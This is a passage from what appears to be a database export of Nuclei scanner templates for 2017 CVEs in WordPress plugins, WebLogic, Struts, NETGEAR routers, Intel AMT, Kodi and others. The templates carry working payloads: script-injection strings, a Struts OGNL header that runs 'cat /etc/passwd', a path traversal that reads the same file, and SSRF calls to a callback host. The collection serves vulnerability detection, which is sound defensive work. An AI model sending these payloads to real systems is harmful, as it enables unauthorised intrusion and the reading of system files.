{{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/error-log-viewer/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Error Log Viewer by BestWebSoft\")'\n condition: and\n# digest: 490a0046304402204ffa643dfec6a2a1304afeb8c507e527816e6ffdbf5bf55d1f78ce117196956c022062d2904783e48e1571ddcd034438544bd6ef716a64604b5cd204c9e6d93f17fc:922c64590222798bb761d5b6d8e72950", "hash": "83c870d42c4a57eed54f774f68043804", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ff4" }, "name": "CVE-2017-18564.yaml", "content": "id: CVE-2017-18564\n\ninfo:\n name: Sender by BestWebSoft < 1.2.1 - Cross-Site Scripting\n author: 
luisfelipe146\n severity: medium\n description: |\n The sender plugin before 1.2.1 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18564\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18564\n - https://wordpress.org/plugins/sender/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18564\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36245\n cpe: cpe:2.3:a:bestwebsoft:sender:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: sender\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/sender/\"\n tags: cve,cve2017,wordpress,wp-plugin,xss,bws-sender,wpscan,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/sender/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Sender by BestWebSoft\")'\n condition: and\n# digest: 490a0046304402206bf5a1ea4bf5034892e440458b150b6df66ff63e42a5677e30878b7d4b43d34102205868e55cb82cdee0363c36f0da53f76767397ddc734f06b2df94b8835493bbe5:922c64590222798bb761d5b6d8e72950", "hash": "6ef1e43ab1d2a5989811d00471506bcd", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ff5" }, "name": "CVE-2017-18565.yaml", "content": "id: CVE-2017-18565\n\ninfo:\n name: Updater by BestWebSoft < 1.35 - Cross-Site Scripting\n author: luisfelipe146\n severity: 
medium\n description: |\n The updater plugin before 1.35 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18565\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18565\n - https://wordpress.org/plugins/updater/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18565\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36245\n cpe: cpe:2.3:a:bestwebsoft:updater:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: updater\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/updater/\"\n tags: cve2017,cve,wordpress,wp-plugin,xss,bws-updater,wpscan,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/updater/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Updater by BestWebSoft\")'\n condition: and\n# digest: 4a0a00473045022100a044599dd64fbe525d5491598bb2bd08fb20f3b1246daa85cf894198d9a4b72a02202c881e075c5cf297c2153729f9a3bca4925a615334a49850ca79a635c41b5efb:922c64590222798bb761d5b6d8e72950", "hash": "eeb6998704c06e1fbab588f9ad85d43a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ff6" }, "name": "CVE-2017-18566.yaml", "content": "id: CVE-2017-18566\n\ninfo:\n name: User Role by BestWebSoft < 1.5.6 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n 
description: |\n The user-role plugin before 1.5.6 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18566\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18566\n - https://wordpress.org/plugins/user-role/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18566\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36836\n cpe: cpe:2.3:a:bestwebsoft:user_role:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: user_role\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/user-role/\"\n tags: cve,cve2017,wordpress,wp-plugin,xss,bws-user-role,wpscan,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/user-role/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"User Role by BestWebSoft\")'\n condition: and\n# digest: 490a0046304402200d379d9480f868260b65e821ad630ab781d2dd52c2f0e25e667b41cf3bf9c7cb022068938f861976e3222cbe26a54ec296eef974f942967912acb942edb9a52d2f7f:922c64590222798bb761d5b6d8e72950", "hash": "502b01017a35b326f459b0eb14997e9e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ff7" }, "name": "CVE-2017-18598.yaml", "content": "id: CVE-2017-18598\n\ninfo:\n name: WordPress Qards - Cross-Site Scripting\n author: pussycat0x\n severity: medium\n description: 
WordPress Qards through 2017-10-11 contains a cross-site scripting vulnerability via a remote document specified in the URL parameter to html2canvasproxy.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.\n remediation: |\n Update to the latest version of the WordPress Qards plugin, which includes a fix for this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/8934\n - https://wpscan.com/vulnerability/454a0ce3-ecfe-47fc-a282-5caa51370645\n - https://wpvulndb.com/vulnerabilities/8934\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18598\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18598\n cwe-id: CWE-79\n epss-score: 0.00094\n epss-percentile: 0.38554\n cpe: cpe:2.3:a:designmodo:qards:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: designmodo\n product: qards\n framework: wordpress\n tags: cve2017,cve,wp-plugin,oast,wpscan,wordpress,ssrf,xss,designmodo\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - '/wp-content/plugins/qards/'\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}'\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: body\n words:\n - \"console.log\"\n# digest: 4b0a00483046022100a1ebb8975874781de2f146909353d3cb9d51b05b60508558c7d599376c062441022100c9a14b006fb26874b9b2f075e436d6c4ca526fe128d549c7c9a7fd5ed7c35cef:922c64590222798bb761d5b6d8e72950", "hash": "b9512fdcb8334bb0460062920d5caebd", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ff8" }, "name": 
"CVE-2017-18638.yaml", "content": "id: CVE-2017-18638\n\ninfo:\n name: Graphite <=1.1.5 - Server-Side Request Forgery\n author: huowuzhao\n severity: high\n description: |\n Graphite's send_email in graphite-web/webapp/graphite/composer/views.py in versions up to 1.1.5 is vulnerable to server-side request forgery (SSRF). The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an email address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information.\n impact: |\n An attacker can exploit this vulnerability to access internal resources, potentially leading to unauthorized access, data leakage, or further attacks.\n remediation: |\n Upgrade to a patched version of Graphite (>=1.1.6) or apply the necessary security patches.\n reference:\n - http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html\n - https://github.com/graphite-project/graphite-web/issues/2008\n - https://github.com/advisories/GHSA-vfj6-275q-4pvm\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18638\n - https://github.com/graphite-project/graphite-web/pull/2499\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2017-18638\n cwe-id: CWE-918\n epss-score: 0.00902\n epss-percentile: 0.80938\n cpe: cpe:2.3:a:graphite_project:graphite:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: graphite_project\n product: graphite\n tags: cve,cve2017,graphite,ssrf,oast,graphite_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}'\n\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n# digest: 
4b0a00483046022100a2ead70694f8fbe9b3e3642b2ba252925a11e895d24c116c6fcf822fec79ffc3022100cb724ed9183a630d2b16eb3ad1ea4e8dd9589e0005873b67061634479dbe51eb:922c64590222798bb761d5b6d8e72950", "hash": "e11d738e9bb16cb43aa62a0a61b2825c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ff9" }, "name": "CVE-2017-3506.yaml", "content": "id: CVE-2017-3506\n\ninfo:\n name: Oracle Fusion Middleware Weblogic Server - Remote OS Command Execution\n author: pdteam\n severity: high\n description: The Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2 is susceptible to a difficult to exploit vulnerability that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.\n remediation: |\n Apply the necessary patches or updates provided by Oracle to fix this vulnerability.\n reference:\n - https://hackerone.com/reports/810778\n - https://nvd.nist.gov/vuln/detail/CVE-2017-3506\n - http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html\n - http://www.securitytracker.com/id/1038296\n - https://github.com/CVEDB/top\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N\n cvss-score: 7.4\n cve-id: CVE-2017-3506\n epss-score: 0.96935\n epss-percentile: 0.99702\n cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: oracle\n product: weblogic_server\n tags: cve,cve2017,rce,oast,hackerone,weblogic,oracle\n\nhttp:\n - raw:\n - |\n POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/xml\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,\n Content-Type: text/xml;charset=UTF-8\n\n \n \n \n \n \n http://{{interactsh-url}}\n \n \n \n \n \n \n \n 
\n \n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4a0a004730450221009af3dc7a023956f425c329f162e8bf603416c546b1876ce01e72ac09119bc24202205406c351433b267b3312803f8f1cd75b9707dfc851008977f33e4db88e70404d:922c64590222798bb761d5b6d8e72950", "hash": "d445b3e2bffad5dca0caa5ef6e30f392", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ffa" }, "name": "CVE-2017-3528.yaml", "content": "id: CVE-2017-3528\n\ninfo:\n name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: 'The Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)) is impacted by open redirect issues in versions 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. These easily exploitable vulnerabilities allow unauthenticated attackers with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. 
Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data.'\n remediation: |\n Apply the necessary patches or updates provided by Oracle to fix the open redirect vulnerability.\n reference:\n - https://blog.zsec.uk/cve-2017-3528/\n - https://www.exploit-db.com/exploits/43592\n - https://nvd.nist.gov/vuln/detail/CVE-2017-3528\n - http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html\n - http://www.securitytracker.com/id/1038299\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2017-3528\n cwe-id: CWE-601\n epss-score: 0.00865\n epss-percentile: 0.81972\n cpe: cpe:2.3:a:oracle:applications_framework:12.1.3:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: oracle\n product: applications_framework\n tags: cve,cve2017,oracle,redirect,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh\"\n\n matchers:\n - type: word\n part: body\n words:\n - 'noresize src=\"/\\interact.sh?configName='\n# digest: 4b0a00483046022100af3043267f661047f2abd255139659c6876cf783ed9a49639876eac74d86842f022100e4a34a3823612505eff0f06d3c4e61785f3cd30694b6d799da940a7b4bd501e2:922c64590222798bb761d5b6d8e72950", "hash": "2b54bb59a9f3cc622f8e40ab4310258e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ffb" }, "name": "CVE-2017-4011.yaml", "content": "id: CVE-2017-4011\n\ninfo:\n name: McAfee Network Data Loss Prevention 9.3.x - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: McAfee Network Data Loss Prevention User-Agent 9.3.x contains a cross-site scripting vulnerability which allows remote attackers to get session/cookie information via modification of the HTTP request.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script 
code in the context of the targeted user's browser, potentially leading to session hijacking or unauthorized access to sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by McAfee to mitigate the XSS vulnerability.\n reference:\n - https://medium.com/@david.valles/cve-2017-4011-reflected-xss-found-in-mcafee-network-data-loss-prevention-ndlp-9-3-x-cf20451870ab\n - https://kc.mcafee.com/corporate/index?page=content&id=SB10198\n - https://nvd.nist.gov/vuln/detail/CVE-2017-4011\n - http://www.securitytracker.com/id/1038523\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-4011\n cwe-id: CWE-79\n epss-score: 0.00142\n epss-percentile: 0.49103\n cpe: cpe:2.3:a:mcafee:network_data_loss_prevention:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: mcafee\n product: network_data_loss_prevention\n tags: cve,cve2017,mcafee,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\"\n\n headers:\n User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n# digest: 4a0a00473045022100b96f472aaedfc274fdfdec8a3b816d78acbc2505300b1d40c565b457822a0cce0220437e462685b9f8c0bc91b355e244b8882fb26379f7d5f3c244f591b218cac549:922c64590222798bb761d5b6d8e72950", "hash": "aa1a01e3e4b5d5605284cb645e16847a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ffc" }, "name": "CVE-2017-5521.yaml", "content": "id: CVE-2017-5521\n\ninfo:\n name: NETGEAR Routers - Authentication Bypass\n author: princechaddha\n severity: high\n description: |\n NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, 
WNR3500Lv2, R6250, R6700, R6900, and R8000 devices are susceptible to authentication bypass via simple crafted requests to the web management server.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized configuration changes, network compromise, and potential exposure of sensitive information.\n remediation: |\n Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability.\n reference:\n - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/\n - http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability\n - https://nvd.nist.gov/vuln/detail/CVE-2017-5521\n - https://www.exploit-db.com/exploits/41205/\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.1\n cve-id: CVE-2017-5521\n cwe-id: CWE-200\n epss-score: 0.97402\n epss-percentile: 0.99914\n cpe: cpe:2.3:o:netgear:r6200_firmware:1.0.1.56_1.0.43:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netgear\n product: r6200_firmware\n tags: cve,cve2017,auth-bypass,netgear,router,kev\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/passwordrecovered.cgi?id={{rand_base(5)}}\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"right\\\">Router\\\\s*Admin\\\\s*Username<\"\n - \"right\\\">Router\\\\s*Admin\\\\s*Password<\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220475cf79bbd6db0830e43542783b81874242bece61820a7894f583371748f015b02207aa0881723c78483cb50b459bbd5dda2b2da88f94190c04e6c6f5526498b7b3b:922c64590222798bb761d5b6d8e72950", "hash": "f72a324b75658122b857ff338c0cc494", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ffd" }, "name": "CVE-2017-5631.yaml", "content": "id: CVE-2017-5631\n\ninfo:\n name: KMCIS CaseAware - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: KMCIS CaseAware 
contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n To remediate this vulnerability, it is recommended to apply the latest patches or updates provided by the vendor.\n reference:\n - https://www.openbugbounty.org/incidents/228262/\n - https://www.exploit-db.com/exploits/42042/\n - https://nvd.nist.gov/vuln/detail/CVE-2017-5631\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-5631\n cwe-id: CWE-79\n epss-score: 0.00286\n epss-percentile: 0.65504\n cpe: cpe:2.3:a:kmc_information_systems:caseaware:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: kmc_information_systems\n product: caseaware\n tags: cve2017,cve,edb,xss,caseaware,kmc_information_systems\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"'>\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402207d69e52f52d55a7b3f0d17541fe9f915dd4df8934f92181ed2e92d60ac0c7bde022072d4faaaef53a8a71f6ad67625ef5ce22b85459680a16b880dabe2a2c39f4099:922c64590222798bb761d5b6d8e72950", "hash": "3d025b3e6b783196a38d3c36b6caed69", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ffe" }, "name": "CVE-2017-5638.yaml", "content": "id: CVE-2017-5638\n\ninfo:\n name: Apache Struts 2 - Remote Command Execution\n author: Random_Robbie\n severity: critical\n description: |\n 
Apache Struts 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is susceptible to remote command injection attacks. The Jakarta Multipart parser has incorrect exception handling and error-message generation during file upload attempts, which can allow an attacker to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header. This was exploited in March 2017 with a Content-Type header containing a #cmd= string.\n impact: |\n Remote attackers can execute arbitrary commands on the target system.\n remediation: |\n Upgrade to Apache Struts 2.3.32 or 2.5.10.1 or apply the necessary patches.\n reference:\n - https://github.com/mazen160/struts-pwn\n - https://isc.sans.edu/diary/22169\n - https://github.com/rapid7/metasploit-framework/issues/8064\n - https://nvd.nist.gov/vuln/detail/CVE-2017-5638\n - http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cve-id: CVE-2017-5638\n cwe-id: CWE-20\n epss-score: 0.97543\n epss-percentile: 0.99995\n cpe: cpe:2.3:a:apache:struts:2.3.5:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: apache\n product: struts\n shodan-query: html:\"Apache Struts\"\n tags: cve2017,cve,apache,kev,msf,struts,rce\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#cmd=\"cat /etc/passwd\",#cmds={\"/bin/bash\",\"-c\",#cmd},#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start(),#b=#process.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#rw=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#rw.println(#e),#rw.flush())}\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - 
\"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b13a1627744af175b5ff3208123d7121d1993c1da5916daba690480cb512f923022100fbb3814519400f6165a557af4ce8f740fd1f47aead0436e981e555de1894a22d:922c64590222798bb761d5b6d8e72950", "hash": "033ece854d728a0064adff1155688f93", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fff" }, "name": "CVE-2017-5689.yaml", "content": "id: CVE-2017-5689\n\ninfo:\n name: Intel Active Management - Authentication Bypass\n author: pdteam\n severity: critical\n description: |\n Intel Active Management platforms are susceptible to authentication bypass. A non-privileged network attacker can gain system privileges to provisioned Intel manageability SKUs: Intel Active Management Technology (AMT) and Intel Standard Manageability. A non-privileged local attacker can provision manageability features, gaining unprivileged network or local system privileges on Intel manageability SKUs: Intel Active Management Technology, Intel Standard Manageability, and Intel Small Business Technology. The issue has been observed in versions 6.x, 7.x, 8.x, 9.x, 10.x, 11.0, 11.5, and 11.6 for all three platforms. 
Versions before 6 and after 11.6 are not impacted.\n impact: |\n An attacker can bypass authentication and gain unauthorized access to the Intel Active Management firmware, potentially leading to unauthorized control of the affected system.\n remediation: |\n Update the Intel Active Management firmware to version 11.6.55, 11.7.55, 11.11.55, 11.0.25, 8.1.71, or 7.1.91 to mitigate the vulnerability.\n reference:\n - https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr\n - https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability\n - https://www.embedi.com/news/mythbusters-cve-2017-5689\n - https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf\n - https://nvd.nist.gov/vuln/detail/cve-2017-5689\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2017-5689\n epss-score: 0.97395\n epss-percentile: 0.99912\n cpe: cpe:2.3:o:intel:active_management_technology_firmware:6.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: intel\n product: active_management_technology_firmware\n shodan-query: title:\"Active Management Technology\"\n tags: cve2017,cve,amt,intel,tenable,kev\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /hw-sys.htm HTTP/1.1\n Host: {{Hostname}}\n\n digest-username: admin\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_2\n words:\n - \"System Status\"\n - \"Active Management Technology\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100c1ebf3bfcfaab0443bed7c0c3767867af141501aac600f4f387e61c7d0dab97c022060fd9aabe9ac1b63059fb46dfa7eb24a6b438f68a5ee9f4f028cb7e65532233c:922c64590222798bb761d5b6d8e72950", "hash": "d31a022c65a936489eba5499aab37a2c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308000" }, "name": "CVE-2017-5982.yaml", "content": "id: CVE-2017-5982\n\ninfo:\n name: Kodi 17.1 - Local File Inclusion\n 
author: 0x_Akoko\n severity: high\n description: |\n Kodi 17.1 is vulnerable to local file inclusion vulnerabilities because of insufficient validation of user input.\n remediation: |\n Upgrade Kodi to a version that is not affected by the CVE-2017-5982 vulnerability.\n reference:\n - https://cxsecurity.com/issue/WLB-2017020164\n - https://www.exploit-db.com/exploits/41312/\n - https://nvd.nist.gov/vuln/detail/CVE-2017-5982\n - https://lists.debian.org/debian-lts-announce/2024/01/msg00009.html\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2017-5982\n cwe-id: CWE-22\n epss-score: 0.0372\n epss-percentile: 0.91582\n cpe: cpe:2.3:a:kodi:kodi:17.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: kodi\n product: kodi\n tags: cve2017,cve,kodi,lfi,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100fa4dbd08aff64d97403d7fb368e7231d1a0730e75422275f56f2de2d62285992022100d2b8678f5fb9dc8a061deabd9eaf63b6ee9db983944639a0c7d1fe041ac49d57:922c64590222798bb761d5b6d8e72950", "hash": "539b25c38b3a55c2bb859e832c1e9c90", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308001" }, "name": "CVE-2017-6090.yaml", "content": "id: CVE-2017-6090\n\ninfo:\n name: PhpColl 2.5.1 Arbitrary File Upload\n author: pikpikcu\n severity: high\n description: PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via 